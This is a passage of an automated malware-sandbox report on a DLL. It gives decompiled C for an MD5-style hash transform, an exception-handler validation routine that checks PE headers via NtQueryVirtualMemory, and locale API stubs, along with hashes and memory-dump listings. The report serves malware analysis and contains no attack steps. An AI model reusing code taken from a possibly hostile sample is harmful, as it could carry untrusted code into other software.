Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 96b8a6cb7799f05c930257c6049a5f0f8156248c6a65db859a3f27f2d130a486
Instruction ID: c9342f75669a2d144d7c8866459d4a4ba80a957d83d1d5db35e925e4b6a8bd66
Opcode Fuzzy Hash: 96b8a6cb7799f05c930257c6049a5f0f8156248c6a65db859a3f27f2d130a486
Instruction Fuzzy Hash: 56F0F971684270AEEF60BF68A81DBA53BB4F71B791F240119F169C92C4D370CC418B44

Uniqueness

Uniqueness Score: -1.00%

Function 00DE3109, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00DE3109(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x00de310c
0x00de3117
0x00de311a
0x00de311d
0x00de311e
0x00de311e
0x00de3129
0x00de313a
0x00de313c
0x00de313f
0x00de313f
0x00de3142
0x00de3142
0x00de3145
0x00de3145
0x00de3148
0x00de3148
0x00de3165
0x00de3168
0x00de317e
0x00de3181
0x00de319b
0x00de319e
0x00de31b4
0x00de31b7
0x00de31b9
0x00de31d1
0x00de31d4
0x00de31d7
0x00de31ef
0x00de31f2
0x00de320c
0x00de320f
0x00de3225
0x00de3228
0x00de322a
0x00de3242
0x00de3247
0x00de324a
0x00de3260
0x00de3263
0x00de327d
0x00de3280
0x00de3296
0x00de3299
0x00de329b
0x00de32b6
0x00de32b9
0x00de32d0
0x00de32d3
0x00de32d7
0x00de32f0
0x00de32f3
0x00de32f5
0x00de32f8
0x00de3313
0x00de3316
0x00de332f
0x00de3332
0x00de3342
0x00de3345
0x00de335d
0x00de3360
0x00de337a
0x00de337d
0x00de3395
0x00de3398
0x00de33ae
0x00de33b1
0x00de33c9
0x00de33cc
0x00de33e4
0x00de33e7
0x00de3401
0x00de3404
0x00de341a
0x00de341d
0x00de3435
0x00de3438
0x00de3452
0x00de3455
0x00de346d
0x00de3470
0x00de3486
0x00de3489
0x00de34a1
0x00de34a4
0x00de34bc
0x00de34bf
0x00de34d1
0x00de34d4
0x00de34e6
0x00de34e9
0x00de34fb
0x00de34fe
0x00de3502
0x00de3512
0x00de3515
0x00de3523
0x00de3526
0x00de3538
0x00de353b
0x00de354f
0x00de3552
0x00de3554
0x00de3564
0x00de3567
0x00de3579
0x00de357c
0x00de358a
0x00de358d
0x00de359f
0x00de35a2
0x00de35a6
0x00de35b6
0x00de35b9
0x00de35cb
0x00de35ce
0x00de35dc
0x00de35df
0x00de35f1
0x00de35f4
0x00de3606
0x00de3609
0x00de361d
0x00de3620
0x00de3634
0x00de3637
0x00de364b
0x00de364e
0x00de3662
0x00de3665
0x00de3679
0x00de367c
0x00de3690
0x00de3695
0x00de36a7
0x00de36aa
0x00de36be
0x00de36c1
0x00de36d5
0x00de36d8
0x00de36ee
0x00de36f1
0x00de3705
0x00de3708
0x00de371a
0x00de371d
0x00de3731
0x00de3734
0x00de3748
0x00de374b
0x00de375f
0x00de3768
0x00de376b
0x00de3774
0x00de377d
0x00de3785
0x00de378d
0x00de3797
0x00de37ac

APIs

memset.NTDLL ref: 00DE37A0

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
Instruction ID: e99db16a29ababdd39a058f356e78393558be1a181329281baee3383080c5fac
Opcode Fuzzy Hash: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
Instruction Fuzzy Hash: B722847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE8005, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DE8005(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xdea330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xdea378 = 1;
										__eflags =  *0xdea378;
										if( *0xdea378 != 0) {
											goto L60;
										}
										_t84 =  *0xdea330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xdea378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xdea330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xdea338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xdea334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xdea338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xdea338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xdea378 = 1;
							__eflags =  *0xdea378;
							if( *0xdea378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xdea338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xdea338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xdea378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xdea338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xdea330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xdea338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xdea338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00de800f
0x00de8012
0x00de8018
0x00de8036
0x00000000
0x00de8036
0x00de8020
0x00de8029
0x00de802f
0x00de803e
0x00de8041
0x00de8044
0x00de804e
0x00de804e
0x00de8050
0x00de8053
0x00de8055
0x00de8055
0x00de8057
0x00de805a
0x00000000
0x00000000
0x00de805c
0x00de805e
0x00de80c4
0x00de80c4
0x00de8222
0x00000000
0x00de8222
0x00de8060
0x00de8060
0x00de8064
0x00de8066
0x00de8066
0x00de8066
0x00de8066
0x00de8069
0x00de806a
0x00de806d
0x00de806d
0x00de8071
0x00de8075
0x00de8083
0x00de8083
0x00de808b
0x00de8091
0x00de8093
0x00de8095
0x00de80a5
0x00de80b2
0x00de80b6
0x00de80bb
0x00de80bd
0x00de813b
0x00de813b
0x00de80bf
0x00de80bf
0x00de80bf
0x00de813d
0x00de813f
0x00de8220
0x00de8220
0x00000000
0x00de8145
0x00de8145
0x00de814c
0x00000000
0x00000000
0x00de8152
0x00de8156
0x00de81b2
0x00de81b4
0x00de81bc
0x00de81be
0x00de81c0
0x00000000
0x00000000
0x00de81c2
0x00de81c8
0x00de81ca
0x00de81cc
0x00de81e1
0x00de81e1
0x00de81e3
0x00de8212
0x00de8219
0x00000000
0x00de8219
0x00de81e7
0x00de81e8
0x00de81ea
0x00de81ec
0x00de81ec
0x00de81ee
0x00de81f0
0x00de81f2
0x00de8206
0x00de8206
0x00de8209
0x00de820b
0x00de820b
0x00de820c
0x00de820c
0x00000000
0x00de81f4
0x00de81f4
0x00de81f4
0x00de81fd
0x00de81fe
0x00de8200
0x00de8202
0x00de8202
0x00000000
0x00de81f4
0x00de81f2
0x00de81ce
0x00de81d5
0x00de81d5
0x00de81d7
0x00000000
0x00000000
0x00de81d9
0x00de81da
0x00de81dd
0x00de81df
0x00000000
0x00000000
0x00000000
0x00de81df
0x00000000
0x00de81d5
0x00de8158
0x00de815b
0x00de8160
0x00000000
0x00000000
0x00de8169
0x00de816b
0x00de8171
0x00000000
0x00000000
0x00de8177
0x00de817d
0x00000000
0x00000000
0x00de8183
0x00de8185
0x00de818e
0x00de8192
0x00000000
0x00000000
0x00de8198
0x00de819b
0x00de819d
0x00000000
0x00000000
0x00de81a4
0x00de81a6
0x00000000
0x00000000
0x00de81a8
0x00de81ac
0x00000000
0x00000000
0x00000000
0x00de81ac
0x00000000
0x00000000
0x00000000
0x00de8097
0x00de8097
0x00de8097
0x00de809e
0x00000000
0x00000000
0x00de80a0
0x00de80a1
0x00de80a3
0x00000000
0x00000000
0x00000000
0x00de80a3
0x00de80cb
0x00de80cd
0x00000000
0x00000000
0x00de80dd
0x00de80df
0x00de80e1
0x00000000
0x00000000
0x00de80e7
0x00de80ee
0x00de811a
0x00de811a
0x00de811c
0x00de811e
0x00de8132
0x00de8134
0x00000000
0x00000000
0x00000000
0x00000000
0x00de8120
0x00de8120
0x00de8120
0x00de8129
0x00de812a
0x00de812c
0x00de812e
0x00de812e
0x00000000
0x00de8120
0x00de80f0
0x00de80f0
0x00de80f3
0x00de80f5
0x00de8107
0x00de8107
0x00de810a
0x00de810c
0x00de810c
0x00de810d
0x00de810d
0x00de8113
0x00de8113
0x00000000
0x00000000
0x00000000
0x00000000
0x00de80f7
0x00de80f7
0x00de80f7
0x00de80fe
0x00000000
0x00000000
0x00de8100
0x00de8100
0x00de8101
0x00000000
0x00000000
0x00000000
0x00de8101
0x00de8103
0x00de8105
0x00de8118
0x00000000
0x00000000
0x00000000
0x00de8118
0x00000000
0x00de8105
0x00de8077
0x00de807a
0x00de807d
0x00000000
0x00000000
0x00de807f
0x00de8081
0x00000000
0x00000000
0x00000000
0x00de8081
0x00de8046
0x00de8048
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00DE80B6

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: b61c1adb83448d439638d725383d14331f5cb425142673fc0b1ed22434e2e207
Instruction ID: e80536fd7c23b7a9a2e2765c010d99b9b5cf9a557da1adc29a8fb13de71a786f
Opcode Fuzzy Hash: b61c1adb83448d439638d725383d14331f5cb425142673fc0b1ed22434e2e207
Instruction Fuzzy Hash: 4961B530600BC28FDB2AEF6FD8C062973A1EB45354F288169D95DCB294EF31DC46A675

Uniqueness

Uniqueness Score: -1.00%

Function 6D47E01E, Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_0000000A,00000001), ref: 6D47E04C

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 6f1d2771d6b10b74b7542fd028f6e7acf9601f2f5ebf4c6d91e549804affa76e
Instruction ID: 460d54e52aada4e71bdd50140966e17724792e8e4150a4302ff67533ec305297
Opcode Fuzzy Hash: 6f1d2771d6b10b74b7542fd028f6e7acf9601f2f5ebf4c6d91e549804affa76e
Instruction Fuzzy Hash: 42E04631120208ABDF11AF94C886FA93BB6BB09360F104014F6088A180C372ECA08B40

Uniqueness

Uniqueness Score: -1.00%

Function 6D47E05B, Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000), ref: 6D47E082

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5ef068f71d664c276724a00dd0986e069a384e532e1ced5775628e4726f8f739
